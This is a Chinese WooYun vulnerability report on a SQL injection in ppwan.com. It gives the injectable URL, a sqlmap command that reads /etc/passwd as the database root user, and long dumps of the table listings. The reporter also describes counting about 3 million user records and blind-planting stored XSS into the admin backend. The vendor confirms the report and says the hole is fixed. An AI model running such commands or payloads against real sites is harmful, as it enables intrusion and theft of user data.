漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0105527
漏洞标题:PPWAN某处MySQL注入(300W用户数据)
相关厂商:ppwan.com
漏洞作者: 路人甲
提交时间:2015-04-09 16:57
修复时间:2015-05-24 17:04
公开时间:2015-05-24 17:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开
简要描述:
PPWAN某处MySQL注入(300W用户), root权限
详细说明:
注射点: http://www.ppwan.com/service/view/?id=9
root 用户。。。
---------
只读文件,没写,所以请放心,数据库也只是看几个重要的数据,以便列举证明
---------
python sqlmap.py -u "http://www.ppwan.com/service/view/?id=1" --dbms=mysql --current-user --file-read "/etc/passwd"
----------------------------------------
查看管理员
查看会员,估计会比较多所 只是计算了下 总数
300W用户。
各种订单信息
-------
另外,前台用户中心,问题提交 储存XSS已盲打后台。
漏洞证明:
|
| pp_question |
| pp_role |
| pp_role_user |
| pp_sdj |
| pp_sendpms |
| pp_sendsms |
| pp_serverhtml |
| pp_servers |
| pp_session |
| pp_vipamount |
| pp_viptrace |
| pp_wxcard |
| pp_wxinfo |
| pp_wxinfokey |
| pp_wxnotice |
| pp_wxplugins |
| pp_wxuser |
| pp_wxuserplugins |
| pp_ydhistory |
| pp_ydsj |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: ppbbs
[292 tables]
+----------------------------------------------------+
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_log_field |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedip |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_forum_buylog |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_newprompt |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_secwhite |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_optimizer |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_remote_port |
| pre_common_report |
| pre_common_searchindex |
| pre_common_seccheck |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_visit |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_filter_post |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_hotreply_member |
| pre_forum_hotreply_number |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_newthread |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_polloption_image |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_sofa |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadcalendar |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadhidelog |
| pre_forum_threadhot |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadprofile |
| pre_forum_threadprofile_group |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_mobile_setting |
| pre_passport |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
+----------------------------------------------------+
Database: ppcms
[166 tables]
+----------------------------------------------------+
| ppc_ecms_infoclass_news |
| ppc_ecms_infotmp_news |
| ppc_ecms_news |
| ppc_ecms_news_check |
| ppc_ecms_news_check_data |
| ppc_ecms_news_data_1 |
| ppc_ecms_news_doc |
| ppc_ecms_news_doc_data |
| ppc_ecms_news_doc_index |
| ppc_ecms_news_index |
| ppc_enewsad |
| ppc_enewsadclass |
| ppc_enewsadminstyle |
| ppc_enewsbefrom |
| ppc_enewsbq |
| ppc_enewsbqclass |
| ppc_enewsbqtemp |
| ppc_enewsbqtempclass |
| ppc_enewsbuybak |
| ppc_enewsbuygroup |
| ppc_enewscard |
| ppc_enewsclass |
| ppc_enewsclass_stats |
| ppc_enewsclass_stats_ip |
| ppc_enewsclass_stats_set |
| ppc_enewsclassadd |
| ppc_enewsclassf |
| ppc_enewsclassnavcache |
| ppc_enewsclasstemp |
| ppc_enewsclasstempclass |
| ppc_enewsdiggips |
| ppc_enewsdo |
| ppc_enewsdolog |
| ppc_enewsdownerror |
| ppc_enewsdownrecord |
| ppc_enewsdownurlqz |
| ppc_enewserrorclass |
| ppc_enewsf |
| ppc_enewsfava |
| ppc_enewsfavaclass |
| ppc_enewsfeedback |
| ppc_enewsfeedbackclass |
| ppc_enewsfeedbackf |
| ppc_enewsfile_1 |
| ppc_enewsfile_member |
| ppc_enewsfile_other |
| ppc_enewsfile_public |
| ppc_enewsgbook |
| ppc_enewsgbookclass |
| ppc_enewsgfenip |
| ppc_enewsgroup |
| ppc_enewshmsg |
| ppc_enewshnotice |
| ppc_enewshy |
| ppc_enewshyclass |
| ppc_enewsindexpage |
| ppc_enewsinfoclass |
| ppc_enewsinfotype |
| ppc_enewsinfovote |
| ppc_enewsjstemp |
| ppc_enewsjstempclass |
| ppc_enewskey |
| ppc_enewskeyclass |
| ppc_enewslink |
| ppc_enewslinkclass |
| ppc_enewslinktmp |
| ppc_enewslisttemp |
| ppc_enewslisttempclass |
| ppc_enewslog |
| ppc_enewsloginfail |
| ppc_enewsmember |
| ppc_enewsmember_connect |
| ppc_enewsmember_connect_app |
| ppc_enewsmemberadd |
| ppc_enewsmemberf |
| ppc_enewsmemberfeedback |
| ppc_enewsmemberform |
| ppc_enewsmembergbook |
| ppc_enewsmembergroup |
| ppc_enewsmemberpub |
| ppc_enewsmenu |
| ppc_enewsmenuclass |
| ppc_enewsmod |
| ppc_enewsnewstemp |
| ppc_enewsnewstempclass |
| ppc_enewsnotcj |
| ppc_enewsnotice |
| ppc_enewspage |
| ppc_enewspageclass |
| ppc_enewspagetemp |
| ppc_enewspayapi |
| ppc_enewspayrecord |
| ppc_enewspic |
| ppc_enewspicclass |
| ppc_enewspl_1 |
| ppc_enewspl_set |
| ppc_enewsplayer |
| ppc_enewsplf |
| ppc_enewspltemp |
| ppc_enewspostdata |
| ppc_enewspostserver |
| ppc_enewsprinttemp |
| ppc_enewspublic |
| ppc_enewspublic_update |
| ppc_enewspubtemp |
| ppc_enewspubvar |
| ppc_enewspubvarclass |
| ppc_enewsqmsg |
| ppc_enewssearch |
| ppc_enewssearchall |
| ppc_enewssearchall_load |
| ppc_enewssearchtemp |
| ppc_enewssearchtempclass |
| ppc_enewsshop_address |
| ppc_enewsshop_ddlog |
| ppc_enewsshop_precode |
| ppc_enewsshop_set |
| ppc_enewsshopdd |
| ppc_enewsshopdd_add |
| ppc_enewsshoppayfs |
| ppc_enewsshopps |
| ppc_enewssp |
| ppc_enewssp_1 |
| ppc_enewssp_2 |
| ppc_enewssp_3 |
| ppc_enewssp_3_bak |
| ppc_enewsspacestyle |
| ppc_enewsspclass |
| ppc_enewssql |
| ppc_enewstable |
| ppc_enewstags |
| ppc_enewstagsclass |
| ppc_enewstagsdata |
| ppc_enewstask |
| ppc_enewstempbak |
| ppc_enewstempdt |
| ppc_enewstempgroup |
| ppc_enewstempvar |
| ppc_enewstempvarclass |
| ppc_enewstogzts |
| ppc_enewsuser |
| ppc_enewsuseradd |
| ppc_enewsuserclass |
| ppc_enewsuserjs |
| ppc_enewsuserjsclass |
| ppc_enewsuserlist |
| ppc_enewsuserlistclass |
| ppc_enewsuserloginck |
| ppc_enewsvote |
| ppc_enewsvotemod |
| ppc_enewsvotetemp |
| ppc_enewswapstyle |
| ppc_enewswfinfo |
| ppc_enewswfinfolog |
| ppc_enewswords |
| ppc_enewsworkflow |
| ppc_enewsworkflowitem |
| ppc_enewswriter |
| ppc_enewsyh |
| ppc_enewszt |
| ppc_enewsztadd |
| ppc_enewsztclass |
| ppc_enewsztf |
| ppc_enewsztinfo |
| ppc_enewszttype |
| ppc_enewszttypeadd |
+----------------------------------------------------+
</code>
</mask>
修复方案:
你们懂的。。。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-04-09 17:03
厂商回复:
感谢作者的提供信息,目前漏洞已经修复
最新状态:
暂无